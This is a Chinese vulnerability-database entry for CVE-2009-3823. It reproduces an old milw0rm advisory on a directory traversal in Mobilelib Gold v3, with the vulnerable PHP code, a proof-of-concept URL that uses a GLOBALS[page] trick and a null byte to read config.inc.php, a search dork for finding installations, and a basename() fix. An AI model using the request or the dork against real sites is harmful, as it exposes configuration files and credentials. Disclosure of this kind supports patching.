Ac4p mobilelib_gold 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118107 漏洞类型 路径遍历
发布时间 2009-07-14 更新时间 2009-07-14
CVE编号 CVE-2009-3823 CNNVD-ID CNNVD-200910-414
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/9144
https://www.securityfocus.com/bid/44186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200910-414
|漏洞详情
MobilelibGOLD3.0版本的myhtml.php中存在一个目录遍历漏洞。攻击者首先需要上传一个恶意文件或注入任意指令到现有的文件,然后通过使用GLOBALS[page]参数,来发送一个特制的URL请求到myhtml.php脚本,以便确定一个来自本地系统的恶意文件。成功利用此漏洞可以在易受攻击的web服务器上获取敏感信息或执行任意代码。
|漏洞EXP
||     ||  | ||
                   o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
                  ( : /  (_)  /      (   .

                       ___________________
                      _/QQQQQQQQQQQQQQQQQQQ\__
                    __/QQQ/````````````````\QQQ\___
                   _/QQQQQ/         \QQQQQQ\
                   /QQQQ/``          ```QQQQ\
                  /QQQQ/             \QQQQ\
                  |QQQQ/  By Qabandi       \QQQQ|
                  |QQQQ|              |QQQQ|
                  |QQQQ|  From Kuwait, PEACE...  |QQQQ|
                  |QQQQ|              |QQQQ|
                  |QQQQ\    iqa[a]hotmail.fr   /QQQQ|
                  \QQQQ\           __ /QQQQ/
                   \QQQQ\          /QQ\_QQQQ/
                   \QQQQ\          \QQQQQQQ/
                    \QQQQQ\         /QQQQQ/_
                    ``\QQQQQ\_____________/QQQ/\QQQQ\_
                      ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
                       ```````````````````   `````

=Vuln:		Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO:		http://www.ac4p.com/
=BUY: 		http://www.ac4p.com/
=Download:   ~~~
=DORK:		intext:"English for dummies"

                 ____________
               _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE ON :)

---------------------------------------===--------------------------------------

                _________________
              _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
   {
   if (file_exists("./myhtmlpages/".$page.".html")) {
   $templat="./myhtmlpages/".$page.".html";
   $tempindex=@fopen($templat,"r");
   $html=@fread($tempindex,@filesize($templat));
   @fclose($tempindex);
   } else {
    $html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
   }
   return $html;
}

---------------------------------------===--------------------------------------

                   _______
                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
 We will bypass the security, where it takes all _GET variables and scans if
 they contain harmful tags such as the null char (%00) ..etc
 
 We will bypass it by using an old GLOBALS[] trick ;)


http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00


---------------------------------------===--------------------------------------

                  __________
                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
   {
   $page = basename($page); //<---- Added the good old Basename func ;)
   if (file_exists("./myhtmlpages/".$page.".html")) {
   $templat="./myhtmlpages/".$page.".html";
   $tempindex=@fopen($templat,"r");
   $html=@fread($tempindex,@filesize($templat));
   @fclose($tempindex);
   } else {
    $html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
   }
   return $html;
}


---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                       \
|   Sec-Code.com ;) Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!!  |
\______________________________________________________________________________/
                \ No More Private /
                 `````````````````
              Salamz to All Muslim Hackers.

# milw0rm.com [2009-07-14]
|受影响的产品
Mobilelib Mobilelib GOLD 3
|参考资料

来源:XF
名称:mobilelib-myhtml-file-include(51713)
链接:http://xforce.iss.net/xforce/xfdb/51713
来源:MILW0RM
名称:9144
链接:http://www.milw0rm.com/exploits/9144